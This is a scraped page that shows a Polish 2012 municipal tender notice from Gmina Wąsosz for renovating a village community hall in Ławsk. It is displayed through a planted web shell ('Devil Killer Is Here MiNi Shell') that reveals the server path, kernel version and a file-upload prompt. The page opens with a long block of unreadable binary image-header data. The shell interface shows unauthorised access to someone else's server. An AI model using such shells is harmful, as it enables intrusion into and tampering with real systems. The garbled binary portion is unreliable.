JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120130/24645-N-2012.html

<p class="kh_header"><b>Wąsosz: Remont  świetlicy  wiejskiej  i  zagospodarowanie  terenu we  wsi  Ławsk</b><br>
<b>Numer ogłoszenia: 24645 - 2012; data zamieszczenia: 30.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wąsosz , pl. Rzędziana 8, 19-222 Wąsosz, woj. podlaskie, tel. 86 2731001, faks 86 2731001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminawasosz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  świetlicy  wiejskiej  i  zagospodarowanie  terenu we  wsi  Ławsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  remont  świetlicy  wiejskiej  i  zagospodarowanie  terenu we  wsi  Ławsk.  Zakres rzeczowy obejmuje między  innymi :
1.WYMIANA  POKRYCIA  DACHU  Z  ETERNITU  NA  BLACHODACHÓWKĘ.                                                   
-roboty  rozbiórkowe  pokrycia  dachowego  z  płyt  azbestowo-cementowych  mocowanych  do łat drewnianych - płyty  faliste,                                                                                                                                       -rozebranie  gąsiorów  i  łacenia  dachu,                                                                                                                       -wywiezienie  i  utylizacja  eternitu  oraz  dostarczenie  dokumentów  potwierdzających  utylizację,                                                                                                                              -rozebranie  obróbek  blacharskich  z  blachy  ocynkowanej,                                                                                             -rozebranie  rur  i  rynien  spustowych  z  blachy  ocynkowanej.                                                                                     -demontaż  i  ponowny  montaż  instalacji  piorunochronowej,                                                                         -zamontowanie wiatrownic  o  przekroju  10,0 cm x 3,2 cm z  tarcicy  nasyconej,                                                                                                -łacenie  połaci  dachu  łatami  40mmx50 m m,  o  rozstawie  do  24  cm  z  tarcicy  nasyconej,                                          -izolacja  z  folii  polietylenowej  przymocowanej  do  konstrukcji  drewnianej  więźby  dachowej,                         -przybicie  kontr - łat  40,00mm x 50,00 mm  o  rozstawie  do   24  cm  z  tarcicy  nasyconej,                                                             -pokrycie  dachu  blacho dachówką  Szafir (katalog  Pruszyński - mat)  w  kolorze  ciemny  brąz  długość  modułu  350/20mm  lub  400/20mm  (mat),                                                                                                                                                                  -zamontowanie gąsiorów  dachowych  z  blacho dachówki  w  kolorze  ciemny  brąz  ( mat),                                                                               -obicie  wiatrownic  bocznych  z  blachy   w  kolorze  ciemny  brąz     (mat),                                                                         -zamontowanie blach  okapowych,  pasów  pod  i  nadrynnowych  z  blachy  powlekanej  w  kolorze  blacho dachówki,                                                                                                                                                                           -obróbki  blacharskie  z blachy  powlekanej  w  kolorze  blacho dachówki  o  szer. około  35 cm ,                       -rynny  dachowe  pół okrągłe  o  śr. 12 cm  montaż  gotowych  elementów  z   blachy powlekanej,                             -rury  spustowe  okrągłe  o  śr.10  cm  montaż  z  gotowych  elementów  z   blachy  powlekanej,
2. WYMIANA STOLARKI  OKIENNEJ  ZEWNĘTRZNEJ.                                                                                       
-rozebranie obróbek  blacharskich z  blachy  ocynkowanej -  parapety  zewnętrzne,                                         -skucie  podlewek  betonowych  pod  parapetami,                                                                                               -odbicie  tynków  wewnętrznych i  zewnętrznych  z  zaprawy  pasami  o  szer.  około 30 cm  (ościeża) ,                        -wykucie  z  muru  ościeżnic  drewnianych  okiennych  o  powierzchni  do  1,00 m2,                                               -wykucie  z  muru  ościeżnic  drewnianych  okiennych  o  powierzchni  ponad  2,00 m2,                                       -zamontowanie okien  z  kształtowników PCV  o  powierzchni  0,6-1,00 m2 (zgodnie  z  przedmiarem) rozwierane  i  uchylno-rozwierane, dwudzielne,  białe,  współczynnik  U=1,7  W/m2 K,                                                                                                     -zamontowanie okien   z  kształtowników  z  PCV  o  powierzchni  ponad  1,50 m2(zgodnie z przedmiarem)  rozwierane  i  uchylno-rozwierane, dwudzielne,  białe,  współczynnik  U=1,7  W/m2 K,                                                                                                  -ochrona  narożników  wypukłych  kątownikiem  metalowym,                                                                                    -uzupełnienie  tynków  zewnętrznych  kat. III  na  podłożach  z cegły (do  2m2  w  1  miejscu) - ościeża,                                      -wykonanie spadków  pod  obróbki  blacharskie  z  zaprawy,                                                                                                   -izolacja  z  papy  asfaltowej  na  sucho  pozioma - 1  warstwa  pod  obróbki  blacharskie,                               -wykonanie obróbek  blacharskich  z  blachy  powlekanej  w  kolorze  pokrycia  dachu  o  szerokości         w  rozwinięciu  około  30 cm - parapety,                                                                                                                                                                       -wywiezienie  samochodami  skrzyniowymi  materiałów  z  rozbiórki  na  odległość  5  km.
3.MALOWANIE  WEWNĘTRZNE  ŚCIAN,  SUFITÓW  I  LAMPERII.                                                              
-wykonanie  tynków  zwykłych  wewnętrznych  kat. III.  z  zaprawy  cementowo- wapiennej  na  ościeżach  szerokości  20 cm,                                                                                                                                                        -ochrona  narożników  wypukłych  kątownikiem  metalowym  od  wewnątrz,                                                         -położenie gładzi  gipsowej  o  gr.3 m m  jednowarstwowej na  ościeżach  o  szerokości  około 20  cm,                                                   -przygotowanie  powierzchni  ścian  (starych  tynków)  pod  malowanie  farbami  emulsyjnymi  z  pod-szpachlowaniem  nierówności,                                                                                                                         - zmycie  starej  farby  z  sufitów  podwieszonych,                                                                                           -gruntowanie  sufitów  pod  malowanie,                                                                                                           -gruntowanie  ścian  pod  malowanie,                                                                                                                -dwukrotne  malowanie  farbami  emulsyjnymi  powierzchni  wewnętrznych  i  zewnętrznych tynków  gładkich  z  gruntowaniem   (ościeży),                                                                                                                            -dwukrotne  malowanie  farbą  olejną  lamperii,                                                                                                        -zabezpieczenie  posadzek  folią  przed  malowaniem,                                                                                                -dostawa  stolików  prostokątnych - blat  płyta  meblowa  100cmx65 cm,  oklejona  obrzeżem  PCV                      3 m m,  narożniki  zaokrąglone,  nogi  stołu  wykonane  z  rury  fi  35 m m  skręcane  do  ramy                        z  kształtownika  20mmx40 m m,                                                                                                                                                  -dostawa  krzeseł  świetlicowych  wys.34 cm,  szer. 31 cm. Krzesło  zgodne z  nową  normą                              PN-EN  1729-1/2007  oraz  PN-EN  1729-2/2007. 
4. WYKONANIE  NOWEGO  UTWARDZENIA  Z  KOSTKI  POLBRUK  ORAZ  LIKWIDACJA
             ISTNIEJACEGO.
-mechaniczne  rozebranie  nawierzchni  z  mieszanek  mineralno  bitumicznych  o  grubości  do  20 cm -asfalt  z  podbudową,                                                                                                                                                  -wywiezienie  asfaltu  z  terenu  rozbiórki  przy  mechanicznym  załadunku  i  wyładunku  samochodem samowyładowczym  na  odległość  5 km  (wraz  z  kosztem  przyjęcia  na  wysypisko),                                              -mechaniczne  wykonanie  koryta  na  całej  szerokości  jezdni  i  chodników  w  gruncie kat. I-IV  głębokości  43 cm  (za  20 cm),                                                                                                                                   - mechaniczne  wykonanie  koryta  na  całej  szerokości  jezdni  i  chodników  w  gruncie  kat. I-IV-                za  każde  dalsze  5 cm  głębokości,  krotność=5,                                                                                           -mechaniczne  profilowanie  i  zagęszczenie  podłoża  pod  warstwy  konstrukcyjne nawierzchni                       w   gruncie  kat. I-IV,                                                                                                                                                           -podsypka  piaskowa  z  zagęszczeniem  mechanicznym  grubość  warstwy  15 cm,                                             -podbudowa  betonowa  (beton B-20) - grubość  warstwy  po  zagęszczeniu  15 cm,                                             -nawierzchnie  z  kostki  brukowej  betonowej  gr.8 cm  na  podsypce  cementowo-piaskowej w  kolorze  szarym,                                                                                                                                                                          -nawierzchnie  z  kostki  brukowej  betonowej  gr.8 cm  na  podsypce  cementowo-piaskowej  z  kostki  kolorowej,                                                                                                                                                          -rowki  pod  krawężniki  i  ławy  krawężnikowe  o  wymiarach  20 cmx20 cm  w  gruncie  kat. I-II,                       - ława  pod  krawężniki  betonowa  zwykła,                                                                                                              -krawężniki  betonowe  wystające  o  wymiarach  15cmx30 cm  na  podsypce  cementowo-piaskowej,             -obrzeża  betonowe  o  wymiarach  20cmx6 cm  na  podsypce  piaskowej  z  wypełnieniem spoin  zaprawą  cementową.,                                                                                                                                                                     5.ELEMENTY  ZEWNETRZNE  I  BRAMA  WJAZDOWA.                                                                                                 
-ręczne  plantowanie  powierzchni  gruntu  rodzimego,  grunt  kat. I- III,                                                                    -rozścielenie  ziemi  urodzajnej,  ręczne  z  przerzutem  na  terenie  płaskim,                                                  -wykonanie  trawników  dywanowych  siewem  na  gruncie  kat.  I-II  bez  nawożenia,                                    -dostawa  i  montaż  bramy  wjazdowej  1,25mx5,00m  dwuskrzydłowej  z  profili  zimno giętych,  brama                     razem  ze  słupkami,  rama  z  profili  40mmx40mmx2mm,  oraz  40mmx20mmx1,5mm, wypełnienie  prętami  z  profili  zamkniętych  20mmx20mmx1,5 mm,  zakończonymi  grotami  ozdobnymi  i  rozstawie  prętów  pionowych  7 cm. Zabezpieczenie antykorozyjne  ocynk   ogniowy + powłoka  proszkowa  i  malowanie  farbą  olejną  2-krotne  oraz  słupki  bramowe  z  rur  fi  150 mm  i  grubości  ścianki  4mm.
6.ZAKUP  WYPOSAŻENIA  DO  ŚWIETLICY.                                                                                                                  
-montaż  i  dostawa  ławek  z  oparciem  typ  OT-0027  -  6 szt,                                                                                -montaż  i  dostawa  koszy  na  śmieci  typ   OT-0038  -  4  szt,                                                                                      -montaż  i  dostawa  stojaków  na  rowery (20-stanowisk), 2  zestawy  po  7 szt,,  i  1  zestaw  na  6 szt  rowerów.
III Uwagi ogólne
1.Szczegółowy zakres prac został ujęty w dokumentacji projektowej stanowiącej załącznik   nr 6 do niniejszej Specyfikacji Istotnych Warunków Zamówienia (zwanej dalej SIWZ) specyfikacji technicznej wykonania   i odbioru robót budowlanych stanowiących załącznik   nr 7 do SIWZ, przedmiarze robót stanowiącym załącznik  nr 8 do SIWZ oraz wzorze umowy, stanowiącym załącznik nr 5 do SIWZ.
2.Ze względu na wynagrodzenie ryczałtowe przedmiar robót ma charakter pomocniczy        do wyceny przedmiotu zamówienia.
3.Zamawiający dopuszcza składanie ofert równoważnych z zastosowaniem innych materiałów o nie gorszych parametrach od zaproponowanych w SIWZ i jakości potwierdzonej certyfikatem. Wykonawca, który powołuje się na rozwiązania równoważne  w  stosunku  do opisywanych przez Zamawiającego, jest obowiązany wykazać, ze oferowane przez niego materiały i roboty budowlane spełniają wymagania określone przez Zamawiającego. Ciężar udowodnienia, ze materiał (wyrób) jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na Wykonawcy składającym ofertę. W takim wypadku Wykonawca na etapie realizacji umowy musi przedłożyć odpowiednie dokumenty, opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty, dopuszczające dane materiały(wyroby) do użytkowania oraz pozwalające jednoznacznie stwierdzić, ze są one równoważne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca starający się o zamówienie jest zobowiązany wnieść wadium                      przed upływem terminu
składania ofert - w wysokości: 2 000,00 zł (słownie: dwa tysiące złotych 00/100) z oznaczeniem przedmiotu zamówienia.
NIE   WNIESIENIE   WADIUM   W   WYMAGANYM   TERMINIE  I  WYMAGANEJ   WYSOKOŚCI  ORAZ  FORMIE  SKUTKUJE   WYKLUCZENIEM   WYKONAWCY   Z   POSTĘPOWANIA.
2. Wadium może być wniesione w:
a) pieniądzu - wniesione przelewem na rachunek bankowy Urzędu Gminy Wąsosz, Bank Spółdzielczy w Szczuczynie Nr konta 43 8768 0003 2605 5215 2000 0010 (DECYDUJE DATA WPŁYWU NA KONTO ZAMAWIAJĄCEGO! - wymogiem jest aby w dniu i o godzinie otwarcia ofert wadium było na koncie Zamawiającego),
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym ze poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 - ze zm.).
3. Wadium wniesione w formach określonych w pkt. 2. b, c, d, e należy złożyć w sekretariacie Urzędu Gminy Wąsosz (codziennie w dni robocze w godz. 730 - 1530) lub włożyć do koperty w której znajduje się oferta (nie bindować, nie zszywać z ofertą, jest to dokument, który nie stanowi oferty i podlega zwrotowi).
Zaleca się by kopię dowodu wniesienia wadium (poświadczoną za zgodność z oryginałem przez osobę podpisującą ofertę - w przypadku wniesienia wadium w pieniądzu lub osobę przyjmującą do depozytu - w przypadku wniesienia wadium w pozostałych formach, przykleić do koperty lub włożyć do koperty, w której znajduje się oferta przetargowa.
5. Zamawiający zwraca wadium na warunkach określonych w art. 46 ust. 1,1a i 2 ustawy Prawo Zamówień Publicznych
6. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
7. Zamawiający zatrzymuje wadium na warunkach określonych w art. 46 ust. 4a i ust. 5 ustawy - Prawo Zamówień Publicznych.                                                                                                                        Złożone poręczenia lub gwarancja muszą zawierać w swojej treści zobowiązanie banku (instytucji ubezpieczeniowej) do nieodwołalnego i bezwarunkowego zapłacenia kwoty zobowiązania na pierwsze żądanie zapłaty zamawiającego, we wszystkich przypadkach, o których mowa w art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie  oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie wykazu robót budowlanych ( zgodnie z załącznikiem nr 9) wykonanych w okresie  ostatnich pięciu lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia jest krótszy  - w tym okresie , z podaniem ich rodzaju wartości, daty i miejsca wykonania oraz załącznikiem dokumentu potwierdzającego,  że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, z którego wynikać będzie wykonanie co najmniej jednej roboty budowlanej  odpowiadające swoim  rodzajem  robotom  określonym  w  SIWZ  i  o  wartości  minimum  200 000 zł  brutto  lub wykonanie  kilku  takich  robót o   łącznej  wartości  nie mniejszej niż 200 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku uznaje się złożenie: informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy,  w wysokości nie mniejszej niż 200 000 złotych. wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
